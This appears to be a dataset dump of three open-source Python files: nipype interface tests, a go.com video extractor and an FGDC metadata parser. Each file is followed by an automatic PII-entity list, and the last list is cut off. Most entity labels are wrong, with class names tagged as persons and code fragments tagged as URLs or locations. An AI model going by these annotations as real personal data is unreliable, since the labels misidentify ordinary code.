def _gen_filename(self, name):
return 'filename'
ci6 = DerivedClass(command='cmd')
yield assert_equal, ci6._parse_inputs()[0], 'filename'
nib.CommandLine.input_spec = nib.CommandLineInputSpec
def test_Commandline_environ():
from nipype import config
config.set_default_config()
ci3 = nib.CommandLine(command='echo')
res = ci3.run()
yield assert_equal, res.runtime.environ['DISPLAY'], ':1'
config.set('execution', 'display_variable', ':3')
res = ci3.run()
yield assert_false, 'DISPLAY' in ci3.inputs.environ
yield assert_equal, res.runtime.environ['DISPLAY'], ':3'
ci3.inputs.environ = {'DISPLAY': ':2'}
res = ci3.run()
yield assert_equal, res.runtime.environ['DISPLAY'], ':2'
def test_CommandLine_output():
tmp_infile = setup_file()
tmpd, name = os.path.split(tmp_infile)
pwd = os.getcwd()
os.chdir(tmpd)
yield assert_true, os.path.exists(tmp_infile)
ci = nib.CommandLine(command='ls -l')
ci.inputs.terminal_output = 'allatonce'
res = ci.run()
yield assert_equal, res.runtime.merged, ''
yield assert_true, name in res.runtime.stdout
ci = nib.CommandLine(command='ls -l')
ci.inputs.terminal_output = 'file'
res = ci.run()
yield assert_true, 'stdout.nipype' in res.runtime.stdout
yield assert_true, isinstance(res.runtime.stdout, (str, bytes))
ci = nib.CommandLine(command='ls -l')
ci.inputs.terminal_output = 'none'
res = ci.run()
yield assert_equal, res.runtime.stdout, ''
ci = nib.CommandLine(command='ls -l')
res = ci.run()
yield assert_true, 'stdout.nipype' in res.runtime.stdout
os.chdir(pwd)
teardown_file(tmpd)
def test_global_CommandLine_output():
tmp_infile = setup_file()
tmpd, name = os.path.split(tmp_infile)
pwd = os.getcwd()
os.chdir(tmpd)
ci = nib.CommandLine(command='ls -l')
res = ci.run()
yield assert_true, name in res.runtime.stdout
yield assert_true, os.path.exists(tmp_infile)
nib.CommandLine.set_default_terminal_output('allatonce')
ci = nib.CommandLine(command='ls -l')
res = ci.run()
yield assert_equal, res.runtime.merged, ''
yield assert_true, name in res.runtime.stdout
nib.CommandLine.set_default_terminal_output('file')
ci = nib.CommandLine(command='ls -l')
res = ci.run()
yield assert_true, 'stdout.nipype' in res.runtime.stdout
nib.CommandLine.set_default_terminal_output('none')
ci = nib.CommandLine(command='ls -l')
res = ci.run()
yield assert_equal, res.runtime.stdout, ''
os.chdir(pwd)
teardown_file(tmpd)
def assert_not_raises(fn, *args, **kwargs):
fn(*args, **kwargs)
return True
def check_dict(ref_dict, tst_dict):
"""Compare dictionaries of inputs and and those loaded from json files"""
def to_list(x):
if isinstance(x, tuple):
x = list(x)
if isinstance(x, list):
for i, xel in enumerate(x):
x[i] = to_list(xel)
return x
failed_dict = {}
for key, value in list(ref_dict.items()):
newval = to_list(tst_dict[key])
if newval != value:
failed_dict[key] = (value, newval)
return failed_dict
| 26,974 | [['UK_NHS', '0000000000'], ['PERSON', 'ts=4 sw=4'], ['PERSON', 'simplejson'], ['PERSON', 'Bunch(b=2'], ['LOCATION', 'c=3'], ['LOCATION', 'b=2'], ['PERSON', 'json'], ['PERSON', 'json'], ['LOCATION', 'os.path.join(tmp_dir'], ['PERSON', 'teardown_file(tmp_dir'], ['NRP', 'shutil.rmtree(tmp_dir'], ['LOCATION', 'spec().goo'], ['PERSON', 'BaseTraitedSpec'], ['DATE_TIME', "desc='bar"], ['LOCATION', 'myif.inputs.kung'], ['PERSON', 'UserWarning'], ['PERSON', 'UserWarning'], ['PERSON', 'UserWarning'], ['PERSON', 'UserWarning'], ['PERSON', 'Int'], ['PERSON', 'UserWarning'], ['PERSON', 'Int'], ['PERSON', 'my_%s_template'], ['PERSON', 'testobj'], ['LOCATION', 's_mootpl'], ['LOCATION', 'test_cycle_namesource2'], ['PERSON', '=tmp_infile'], ['PERSON', 'hashval1'], ['PERSON', 'nif'], ['LOCATION', 'nib.BaseInterface.help'], ['PERSON', 'tmp_json = os.path.join(tmp_dir'], ['PERSON', 'Int'], ['PERSON', 'Bool'], ['PERSON', 'input4 = nib.traits'], ['PERSON', 'input4'], ['PERSON', 'input4'], ['PERSON', 'setf'], ['LOCATION', 'tsthash.inputs.get_traitsfree'], ['LOCATION', 'tsthash2.inputs.get_traitsfree'], ['LOCATION', 'obj._check_version_requirements'], ['LOCATION', 'obj._check_version_requirements'], ['LOCATION', 'obj._check_version_requirements'], ['LOCATION', 'obj._check_version_requirements'], ['NRP', "desc='a"], ['LOCATION', "desc='an"], ['PERSON', 'roo = nib.traits'], ['PERSON', "ci6 = DerivedClass(command='cmd'"], ['LOCATION', 'test_CommandLine_output'], ['PERSON', 'fn(*args'], ['LOCATION', 'json'], ['PERSON', 'to_list(xel'], ['URL', 'library.in'], ['URL', 'nipype.interfaces.ba'], ['URL', 'nipype.utils.fi'], ['URL', 'nipype.interfaces.ba'], ['URL', 'traits.testing.no'], ['URL', 'b.ge'], ['URL', 'b.ge'], ['URL', 'os.pa'], ['URL', 'os.pa'], ['URL', 'os.path.jo'], ['URL', 'nib.md'], ['URL', 'fp.re'], ['URL', 'tempfile.mk'], ['URL', 'os.path.jo'], ['URL', 'nib.Tr'], ['URL', 'nib.Tr'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.tr'], ['URL', 'nib.traits.Tr'], ['URL', 'infields.ge'], ['URL', 'nib.Ba'], ['URL', 'a.ad'], ['URL', 'nib.traits.Int'], ['URL', 'a.fo'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.traits.Int'], ['URL', 'nib.tr'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Ba'], ['URL', 'myif.in'], ['URL', 'myif.inputs.fo'], ['URL', 'myif.inputs.fo'], ['URL', 'myif.in'], ['URL', 'myif.inputs.fo'], ['URL', 'myif.in'], ['URL', 'myif.in'], ['URL', 'warnings.ca'], ['URL', 'warnings.fi'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Tr'], ['URL', 'warnings.ca'], ['URL', 'warnings.fi'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Tr'], ['URL', 'warnings.ca'], ['URL', 'warnings.fi'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Tr'], ['URL', 'warnings.ca'], ['URL', 'warnings.fi'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.traits.Int'], ['URL', 'instance.fo'], ['URL', 'nib.Tr'], ['URL', 'w1.me'], ['URL', 'warnings.ca'], ['URL', 'warnings.fi'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.traits.Int'], ['URL', 'instance.fo'], ['URL', 'nib.Tr'], ['URL', 'instance.fo'], ['URL', 'instance.ba'], ['URL', 'w1.me'], ['URL', 'os.ge'], ['URL', 'os.ch'], ['URL', 'nib.Com'], ['URL', 'nib.Fi'], ['URL', 'nib.Fi'], ['URL', 'traits.Int'], ['URL', 'nib.Fi'], ['URL', 'nib.Com'], ['URL', 'testobj.inputs.do'], ['URL', 'testobj.in'], ['URL', 'testobj.cm'], ['URL', 'testobj.inputs.mo'], ['URL', 'testobj.cm'], ['URL', 'os.ch'], ['URL', 'os.ge'], ['URL', 'os.ch'], ['URL', 'nib.Com'], ['URL', 'nib.Fi'], ['URL', 'nib.Fi'], ['URL', 'nib.Fi'], ['URL', 'nib.Com'], ['URL', 'testobj.inputs.do'], ['URL', 'testobj.cm'], ['URL', 'os.ch'], ['URL', 'os.ge'], ['URL', 'os.ch'], ['URL', 'nib.Com'], ['URL', 'nib.Fi'], ['URL', 'nib.Fi'], ['URL', 'nib.Fi'], ['URL', 'nib.Com'], ['URL', 'to0.cm'], ['URL', 'nib.Ni'], ['URL', 'os.ch'], ['URL', 'os.ge'], ['URL', 'os.ch'], ['URL', 'nib.Com'], ['URL', 'nib.Fi'], ['URL', 'nib.Fi'], ['URL', 'nib.Fi'], ['URL', 'nib.Com'], ['URL', 'to1.in'], ['URL', 'to1.cm'], ['URL', 'nib.Ni'], ['URL', 'os.ch'], ['URL', 'os.pa'], ['URL', 'os.pa'], ['URL', 'nib.Tr'], ['URL', 'nib.Fi'], ['URL', 'nib.traits.Li'], ['URL', 'nib.Fi'], ['URL', 'infields.ge'], ['URL', 'os.pa'], ['URL', 'os.ge'], ['URL', 'os.ch'], ['URL', 'os.pa'], ['URL', 'nib.Tr'], ['URL', 'nib.Fi'], ['URL', 'nib.traits.Li'], ['URL', 'nib.Fi'], ['URL', 'infields.ge'], ['URL', 'nib.Tr'], ['URL', 'nib.Fi'], ['URL', 'nib.traits.Li'], ['URL', 'nib.Fi'], ['URL', 'infields.ge'], ['URL', 'nib.Tr'], ['URL', 'nib.Fi'], ['URL', 'nib.traits.Li'], ['URL', 'nib.Fi'], ['URL', 'infields.ge'], ['URL', 'os.ch'], ['URL', 'nib.Interface.in'], ['URL', 'nib.Int'], ['URL', 'nib.Int'], ['URL', 'nib.Int'], ['URL', 'nib.Int'], ['URL', 'nib.Int'], ['URL', 'nib.Int'], ['URL', 'nib.Int'], ['URL', 'nif.ru'], ['URL', 'nif.ag'], ['URL', 'nib.Ba'], ['URL', 'nib.Ba'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.traits.Int'], ['URL', 'nib.traits.Int'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Fi'], ['URL', 'nib.Fi'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Ba'], ['URL', '.inputs.fo'], ['URL', 'nib.BaseInterface.in'], ['URL', 'nib.Ba'], ['URL', 'tempfile.mk'], ['URL', 'os.path.jo'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.tr'], ['URL', 'nib.traits.Bo'], ['URL', 'nib.traits.St'], ['URL', 'nib.Ba'], ['URL', 'bif.sa'], ['URL', 'bif2.inputs.ge'], ['URL', 'bif3.inputs.ge'], ['URL', 'dict.co'], ['URL', 'bif4.inputs.ge'], ['URL', 'bif5.inputs.ge'], ['URL', 'bif6.inputs.ge'], ['URL', 'nipype.interfaces.an'], ['URL', 'tsthash.inputs.ge'], ['URL', 'tsthash2.inputs.ge'], ['URL', 'tsthash.inputs.ge'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Ba'], ['URL', 'obj.in'], ['URL', 'config.se'], ['URL', 'obj.in'], ['URL', 'config.se'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Ba'], ['URL', 'obj.inputs.fo'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Ba'], ['URL', 'obj.in'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Ba'], ['URL', 'obj.inputs.fo'], ['URL', 'obj.in'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Ba'], ['URL', 'obj.inputs.fo'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Ba'], ['URL', 'obj.inputs.fo'], ['URL', 'obj.in'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Ba'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Ba'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Tr'], ['URL', 'nib.traits.Int'], ['URL', 'nib.Ba'], ['URL', 'obj.ru'], ['URL', 'nib.Com'], ['URL', 'nib.Com'], ['URL', 'ci.cm'], ['URL', 'ci.inputs.ar'], ['URL', 'nib.Com'], ['URL', 'ci2.cm'], ['URL', 'nib.Com'], ['URL', 'ci3.in'], ['URL', 'ci3.ru'], ['URL', 'res.ru'], ['URL', 'nib.Com'], ['URL', 'nib.St'], ['URL', 'nib.traits.Bo'], ['URL', 'nib.traits.Li'], ['URL', 'nib.traits.Li'], ['URL', 'nib.traits.Int'], ['URL', 'nib.traits.St'], ['URL', 'nib.traits.Bo'], ['URL', 'nib.CommandLine.in'], ['URL', 'nib.Com'], ['URL', 'ci4.inputs.fo'], ['URL', 'ci4.in'], ['URL', 'ci4.in'], ['URL', 'ci4.inputs.mo'], ['URL', 'ci4.inputs.no'], ['URL', 'ci4.inputs.ro'], ['URL', 'ci4.inputs.so'], ['URL', 'ci4.inputs.so'], ['URL', 'nib.Com'], ['URL', 'nib.Fi'], ['URL', 'nib.CommandLine.in'], ['URL', 'nib.Com'], ['URL', 'nib.Com'], ['URL', 'nib.CommandLine.in'], ['URL', 'nib.Com'], ['URL', 'config.se'], ['URL', 'nib.Com'], ['URL', 'ci3.ru'], ['URL', 'res.ru'], ['URL', 'config.se'], ['URL', 'ci3.ru'], ['URL', 'ci3.in'], ['URL', 'res.ru'], ['URL', 'ci3.in'], ['URL', 'ci3.ru'], ['URL', 'res.ru'], ['URL', 'os.pa'], ['URL', 'os.ge'], ['URL', 'os.ch'], ['URL', 'os.pa'], ['URL', 'nib.Com'], ['URL', 'ci.in'], ['URL', 'ci.ru'], ['URL', 'res.runtime.me'], ['URL', 'res.runtime.st'], ['URL', 'nib.Com'], ['URL', 'ci.in'], ['URL', 'ci.ru'], ['URL', 'stdout.ni'], ['URL', 'res.runtime.st'], ['URL', 'res.runtime.st'], ['URL', 'nib.Com'], ['URL', 'ci.in'], ['URL', 'ci.ru'], ['URL', 'res.runtime.st'], ['URL', 'nib.Com'], ['URL', 'ci.ru'], ['URL', 'stdout.ni'], ['URL', 'res.runtime.st'], ['URL', 'os.ch'], ['URL', 'os.pa'], ['URL', 'os.ge'], ['URL', 'os.ch'], ['URL', 'nib.Com'], ['URL', 'ci.ru'], ['URL', 'res.runtime.st'], ['URL', 'os.pa'], ['URL', 'nib.CommandLine.se'], ['URL', 'nib.Com'], ['URL', 'ci.ru'], ['URL', 'res.runtime.me'], ['URL', 'res.runtime.st'], ['URL', 'nib.CommandLine.se'], ['URL', 'nib.Com'], ['URL', 'ci.ru'], ['URL', 'stdout.ni'], ['URL', 'res.runtime.st'], ['URL', 'nib.CommandLine.se'], ['URL', 'nib.Com'], ['URL', 'ci.ru'], ['URL', 'res.runtime.st'], ['URL', 'os.ch'], ['URL', 'dict.it']] |
53 | # coding: utf-8
from __future__ import unicode_literals
import re
from .adobepass import AdobePassIE
from ..utils import (
int_or_none,
determine_ext,
parse_age_limit,
urlencode_postdata,
ExtractorError,
)
class GoIE(AdobePassIE):
_SITE_INFO = {
'abc': {
'brand': '001',
'requestor_id': 'ABC',
},
'freeform': {
'brand': '002',
'requestor_id': 'ABCFamily',
},
'watchdisneychannel': {
'brand': '004',
'requestor_id': 'Disney',
},
'watchdisneyjunior': {
'brand': '008',
'requestor_id': 'DisneyJunior',
},
'watchdisneyxd': {
'brand': '009',
'requestor_id': 'DisneyXD',
}
}
_VALID_URL = r'https?://(?:(?P<sub_domain>%s)\.)?go\.com/(?:[^/]+/)*(?:vdka(?P<id>\w+)|season-\d+/\d+-(?P<display_id>[^/?#]+))' % '|'.join(_SITE_INFO.keys())
_TESTS = [{
'url': 'http://abc.go.PI:KEY',
'info_dict': {
'id': '0_g86w5onx',
'ext': 'mp4',
'title': 'Sneak Peek: Language Arts',
'description': 'PI:KEY',
},
'params': {
# m3u8 download
'skip_download': True,
},
}, {
'url': 'http://abc.go.com/shows/after-paradise/video/most-recent/vdka3335601',
'only_matching': True,
}]
def _real_extract(self, url):
sub_domain, video_id, display_id = re.match(self._VALID_URL, url).groups()
if not video_id:
webpage = self._download_webpage(url, display_id)
video_id = self._search_regex(
# There may be inner quotes, e.g. data-video-id="'VDKA3609139'"
# from http://freeform.go.com/shows/shadowhunters/episodes/season-2/1-this-guilty-blood
r'data-video-id=["\']*VDKA(\w+)', webpage, 'video id')
site_info = self._SITE_INFO[sub_domain]
brand = site_info['brand']
video_data = self._download_json(
'http://api.contents.watchabc.go.com/vp2/ws/contents/3000/videos/%s/001/-1/-1/-1/%s/-1/-1.json' % (brand, video_id),
video_id)['video'][0]
title = video_data['title']
formats = []
for asset in video_data.get('assets', {}).get('asset', []):
asset_url = asset.get('value')
if not asset_url:
continue
format_id = asset.get('format')
ext = determine_ext(asset_url)
if ext == 'm3u8':
video_type = video_data.get('type')
data = {
'video_id': video_data['id'],
'video_type': video_type,
'brand': brand,
'device': '001',
}
if video_data.get('accesslevel') == '1':
requestor_id = site_info['requestor_id']
resource = self._get_mvpd_resource(
requestor_id, title, video_id, None)
auth = self._extract_mvpd_auth(
url, video_id, requestor_id, resource)
data.update({
'token': auth,
'token_type': 'ap',
'adobe_requestor_id': requestor_id,
})
else:
self._initialize_geo_bypass(['US'])
entitlement = self._download_json(
'https://api.entitlement.watchabc.go.com/vp2/ws-secure/entitlement/2020/authorize.json',
video_id, data=urlencode_postdata(data), headers=self.geo_verification_headers())
errors = entitlement.get('errors', {}).get('errors', [])
if errors:
for error in errors:
if error.get('code') == 1002:
self.raise_geo_restricted(
error['message'], countries=['US'])
error_message = ', '.join([error['message'] for error in errors])
raise ExtractorError('%s said: %s' % (self.IE_NAME, error_message), expected=True)
asset_url += '?' + entitlement['uplynkData']['sessionKey']
formats.extend(self._extract_m3u8_formats(
asset_url, video_id, 'mp4', m3u8_id=format_id or 'hls', fatal=False))
else:
f = {
'format_id': format_id,
'url': asset_url,
'ext': ext,
}
if re.search(r'(?:/mp4/source/|_source\.mp4)', asset_url):
f.update({
'format_id': ('%s-' % format_id if format_id else '') + 'SOURCE',
'preference': 1,
})
else:
mobj = re.search(r'/(\d+)x(\d+)/', asset_url)
if mobj:
height = int(mobj.group(2))
f.update({
'format_id': ('%s-' % format_id if format_id else '') + '%dP' % height,
'width': int(mobj.group(1)),
'height': height,
})
formats.append(f)
self._sort_formats(formats)
subtitles = {}
for cc in video_data.get('closedcaption', {}).get('src', []):
cc_url = cc.get('value')
if not cc_url:
continue
ext = determine_ext(cc_url)
if ext == 'xml':
ext = 'ttml'
subtitles.setdefault(cc.get('lang'), []).append({
'url': cc_url,
'ext': ext,
})
thumbnails = []
for thumbnail in video_data.get('thumbnails', {}).get('thumbnail', []):
thumbnail_url = thumbnail.get('value')
if not thumbnail_url:
continue
thumbnails.append({
'url': thumbnail_url,
'width': int_or_none(thumbnail.get('width')),
'height': int_or_none(thumbnail.get('height')),
})
return {
'id': video_id,
'title': title,
'description': video_data.get('longdescription') or video_data.get('description'),
'duration': int_or_none(video_data.get('duration', {}).get('value'), 1000),
'age_limit': parse_age_limit(video_data.get('tvrating', {}).get('rating')),
'episode_number': int_or_none(video_data.get('episodenumber')),
'series': video_data.get('show', {}).get('title'),
'season_number': int_or_none(video_data.get('season', {}).get('num')),
'thumbnails': thumbnails,
'formats': formats,
'subtitles': subtitles,
}
| 6,904 | [['MEDICAL_LICENSE', 'ka3335601'], ['URL', "http://abc.go.com/shows/after-paradise/video/most-recent/vdka3335601',"], ['LOCATION', '.adobepass'], ['LOCATION', 'video_id, display_id ='], ['URL', 're.ma'], ['URL', 'asset.ge'], ['URL', 'self.ge'], ['URL', 're.se'], ['PERSON', "mobj = re.search(r'/(\\d+)x(\\d+)/'"], ['URL', 'cc.ge'], ['URL', 'thumbnail.ge'], ['URL', 'thumbnail.ge'], ['PERSON', "int_or_none(video_data.get('season"], ['URL', 'http://freeform.go.com/shows/shadowhunters/episodes/season-2/1-this-guilty-blood'], ['URL', "http://api.contents.watchabc.go.com/vp2/ws/contents/3000/videos/%s/001/-1/-1/-1/%s/-1/-1.json'"], ['URL', "https://api.entitlement.watchabc.go.com/vp2/ws-secure/entitlement/2020/authorize.json',"], ['URL', 'INFO.ke'], ['URL', 'data.ge'], ['URL', 'asset.ge'], ['URL', 'data.ge'], ['URL', 'data.ge'], ['URL', 'entitlement.ge'], ['URL', 'error.ge'], ['URL', 'self.IE'], ['URL', 're.se'], ['URL', 'mobj.gr'], ['URL', 'mobj.gr'], ['URL', 'data.ge'], ['URL', 'subtitles.se'], ['URL', 'cc.ge'], ['URL', 'data.ge'], ['URL', 'thumbnail.ge'], ['URL', 'data.ge'], ['URL', 'data.ge'], ['URL', 'data.ge'], ['URL', 'data.ge'], ['URL', 'data.ge'], ['URL', 'data.ge'], ['URL', 'data.ge']] |
54 | # -*- coding: ISO-8859-15 -*-
# =============================================================================
# Copyright (c) 2010 Tom Kralidis
#
# Authors : Tom Kralidis dummy@email.com
#
# Contact email: dummy@email.com
# =============================================================================
""" FGDC metadata parser """
from __future__ import (absolute_import, division, print_function)
from owscapable.etree import etree
from owscapable import util
class Metadata(object):
""" Process metadata """
def __init__(self, md):
if hasattr(md, 'getroot'): # standalone document
self.xml = etree.tostring(md.getroot())
else: # part of a larger document
self.xml = etree.tostring(md)
self.idinfo = Idinfo(md)
self.eainfo = Eainfo(md)
self.distinfo = Distinfo(md)
self.metainfo = Metainfo(md)
if self.idinfo.datasetid:
self.identifier = self.idinfo.datasetid
class Idinfo(object):
""" Process idinfo """
def __init__(self, md):
val = md.find('idinfo/datasetid')
self.datasetid = util.testXMLValue(val)
val = md.find('idinfo/citation')
self.citation = Citation(val)
val = md.find('idinfo/descript')
if val is not None:
self.descript = Descript(val)
val = md.find('idinfo/timeperd')
self.timeperd = Timeperd(val)
val = md.find('idinfo/status')
if val is not None:
self.status = Status(val)
val = md.find('idinfo/spdom')
if val is not None:
self.spdom = Spdom(val)
val = md.find('idinfo/keywords')
if val is not None:
self.keywords = Keywords(val)
val = md.find('idinfo/accconst')
self.accconst = util.testXMLValue(val)
val = md.find('idinfo/useconst')
self.useconst = util.testXMLValue(val)
val = md.find('idinfo/ptcontac')
if val is not None:
self.ptcontac = Ptcontac(val)
val = md.find('idinfo/datacred')
self.datacred = util.testXMLValue(val)
val = md.find('idinfo/crossref')
self.crossref = Citation(val)
class Citation(object):
""" Process citation """
def __init__(self, md):
if md is not None:
self.citeinfo = {}
val = md.find('citeinfo/origin')
self.citeinfo['origin'] = util.testXMLValue(val)
val = md.find('citeinfo/pubdate')
self.citeinfo['pubdate'] = util.testXMLValue(val)
val = md.find('citeinfo/title')
self.citeinfo['title'] = util.testXMLValue(val)
val = md.find('citeinfo/geoform')
self.citeinfo['geoform'] = util.testXMLValue(val)
val = md.find('citeinfo/pubinfo/pubplace')
self.citeinfo['pubplace'] = util.testXMLValue(val)
val = md.find('citeinfo/pubinfo/publish')
self.citeinfo['publish'] = util.testXMLValue(val)
self.citeinfo['onlink'] = []
for link in md.findall('citeinfo/onlink'):
self.citeinfo['onlink'].append(util.testXMLValue(link))
class Descript(object):
""" Process descript """
def __init__(self, md):
val = md.find('abstract')
self.abstract = util.testXMLValue(val)
val = md.find('purpose')
self.purpose = util.testXMLValue(val)
val = md.find('supplinf')
self.supplinf = util.testXMLValue(val)
class Timeperd(object):
""" Process timeperd """
def __init__(self, md):
if md is not None:
val = md.find('current')
self.current = util.testXMLValue(val)
val = md.find('timeinfo')
if val is not None:
self.timeinfo = Timeinfo(val)
class Timeinfo(object):
""" Process timeinfo """
def __init__(self, md):
val = md.find('sngdate')
if val is not None:
self.sngdate = Sngdate(val)
val = md.find('rngdates')
if val is not None:
self.rngdates = Rngdates(val)
class Sngdate(object):
""" Process sngdate """
def __init__(self, md):
val = md.find('caldate')
self.caldate = util.testXMLValue(val)
val = md.find('time')
self.time = util.testXMLValue(val)
class Rngdates(object):
""" Process rngdates """
def __init__(self, md):
val = md.find('begdate')
self.begdate = util.testXMLValue(val)
val = md.find('begtime')
self.begtime = util.testXMLValue(val)
val = md.find('enddate')
self.enddate = util.testXMLValue(val)
val = md.find('endtime')
self.endtime = util.testXMLValue(val)
class Status(object):
""" Process status """
def __init__(self, md):
val = md.find('progress')
self.progress = util.testXMLValue(val)
val = md.find('update')
self.update = util.testXMLValue(val)
class Spdom(object):
""" Process spdom """
def __init__(self, md):
val = md.find('bounding/westbc')
self.westbc = util.testXMLValue(val)
val = md.find('bounding/eastbc')
self.eastbc = util.testXMLValue(val)
val = md.find('bounding/northbc')
self.northbc = util.testXMLValue(val)
val = md.find('bounding/southbc')
self.southbc = util.testXMLValue(val)
if (self.southbc is not None and self.northbc is not None and
self.eastbc is not None and self.westbc is not None):
self.bbox = Bbox(self)
class Bbox(object):
""" Generate bbox for spdom (convenience function) """
def __init__(self, spdom):
self.minx = spdom.westbc
self.miny = spdom.southbc
self.maxx = spdom.eastbc
self.maxy = spdom.northbc
class Keywords(object):
""" Process keywords """
def __init__(self, md):
self.theme = []
self.place = []
self.temporal = []
for i in md.findall('theme'):
theme = {}
val = i.find('themekt')
theme['themekt'] = util.testXMLValue(val)
theme['themekey'] = []
for j in i.findall('themekey'):
themekey = util.testXMLValue(j)
if themekey is not None:
theme['themekey'].append(themekey)
self.theme.append(theme)
for i in md.findall('place'):
theme = {}
place = {}
val = i.find('placekt')
theme['placekt'] = util.testXMLValue(val)
theme['placekey'] = []
for j in i.findall('placekey'):
theme['placekey'].append(util.testXMLValue(j))
self.place.append(place)
for i in md.findall('temporal'):
theme = {}
temporal = {}
val = i.find('tempkt')
theme['tempkt'] = util.testXMLValue(val)
theme['tempkey'] = []
for j in i.findall('tempkey'):
theme['tempkey'].append(util.testXMLValue(j))
self.temporal.append(temporal)
class Ptcontac(object):
""" Process ptcontac """
def __init__(self, md):
val = md.find('cntinfo/cntorgp/cntorg')
self.cntorg = util.testXMLValue(val)
val = md.find('cntinfo/cntorgp/cntper')
self.cntper = util.testXMLValue(val)
val = md.find('cntinfo/cntpos')
self.cntpos = util.testXMLValue(val)
val = md.find('cntinfo/cntaddr/addrtype')
self.addrtype = util.testXMLValue(val)
val = md.find('cntinfo/cntaddr/address')
self.address = util.testXMLValue(val)
val = md.find('cntinfo/cntaddr/city')
self.city = util.testXMLValue(val)
val = md.find('cntinfo/cntaddr/state')
self.state = util.testXMLValue(val)
val = md.find('cntinfo/cntaddr/postal')
self.postal = util.testXMLValue(val)
val = md.find('cntinfo/cntaddr/country')
self.country = util.testXMLValue(val)
val = md.find('cntinfo/cntvoice')
self.voice = util.testXMLValue(val)
val = md.find('cntinfo/cntemail')
self.email = util.testXMLValue(val)
class Eainfo(object):
""" Process eainfo """
def __init__(self, md):
val = md.find('eainfo/detailed/enttyp/enttypl')
self.enttypl = util.testXMLValue(val)
val = md.find('eainfo/detailed/enttyp/enttypd')
self.enttypd = util.testXMLValue(val)
val = md.find('eainfo/detailed/enttyp/enttypds')
self.enttypds = util.testXMLValue(val)
self.attr = []
for i in md.findall('eainfo/detailed/attr'):
attr = {}
val = i.find('attrlabl')
attr['attrlabl'] = util.testXMLValue(val)
val = i.find('attrdef')
attr['attrdef'] = util.testXMLValue(val)
val = i.find('attrdefs')
attr['attrdefs'] = util.testXMLValue(val)
val = i.find('attrdomv/udom')
attr['udom'] = util.testXMLValue(val)
self.attr.append(attr)
class Distinfo(object):
""" Process distinfo """
def __init__(self, md):
val = md.find('distinfo')
if val is not None:
val2 = val.find('stdorder')
if val2 is not None:
self.stdorder = {'digform': []}
for link in val2.findall('digform'):
digform = {}
digform['name'] = util.testXMLValue(link.find('digtinfo/formname'))
digform['url'] = util.testXMLValue(link.find('digtopt/onlinopt/computer/networka/networkr/'))
self.stdorder['digform'].append(digform)
class Metainfo(object):
""" Process metainfo """
def __init__(self, md):
val = md.find('metainfo/metd')
self.metd = util.testXMLValue(val)
val = md.find('metainfo/metrd')
self.metrd = util.testXMLValue(val)
val = md.find('metainfo/metc')
if val is not None:
self.metc = Ptcontac(val)
val = md.find('metainfo/metstdn')
self.metstdn = util.testXMLValue(val)
val = md.find('metainfo/metstdv')
self.metstdv = util.testXMLValue(val)
val = md.find('metainfo/metac')
self.metac = util.testXMLValue(val)
val = md.find('metainfo/metuc')
self.metuc = util.testXMLValue(val)
| 10,441 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2010'], ['PERSON', 'Tom Kralidis'], ['PERSON', 'Tom Kralidis dummy@email.com'], ['PERSON', 'md):'], ['PERSON', 'md):\n val'], ['PERSON', 'self.timeperd = Timeperd(val'], ['PERSON', 'md):\n '], ['URL', 'self.ci'], ['URL', 'md.fi'], ['URL', 'self.ci'], ['PERSON', 'md):\n val'], ['PERSON', 'md):\n '], ['PERSON', 'md):\n val'], ['PERSON', "md.find('sngdate"], ['PERSON', 'md):\n val'], ['PERSON', "md.find('caldate"], ['PERSON', 'self.time = util.testXMLValue(val'], ['PERSON', 'md):\n val'], ['PERSON', "md.find('begdate"], ['PERSON', "md.find('begtime"], ['PERSON', "md.find('enddate"], ['PERSON', 'md):\n val'], ['PERSON', "md.find('update"], ['PERSON', 'md):\n val'], ['PERSON', 'md):\n val'], ['PERSON', 'md):\n val'], ['PERSON', 'self.enttypd ='], ['PERSON', 'md):\n val'], ['URL', 'val2.fi'], ['URL', 'link.fi'], ['URL', 'link.fi'], ['PERSON', 'md):\n val'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'owscapable.et'], ['URL', 'etree.to'], ['URL', 'md.ge'], ['URL', 'etree.to'], ['URL', 'self.id'], ['URL', 'self.me'], ['URL', 'self.id'], ['URL', 'self.id'], ['URL', 'self.id'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'self.ci'], ['URL', 'md.fi'], ['URL', 'self.de'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'self.st'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'self.ke'], ['URL', 'md.fi'], ['URL', 'self.ac'], ['URL', 'md.fi'], ['URL', 'self.us'], ['URL', 'md.fi'], ['URL', 'self.pt'], ['URL', 'md.fi'], ['URL', 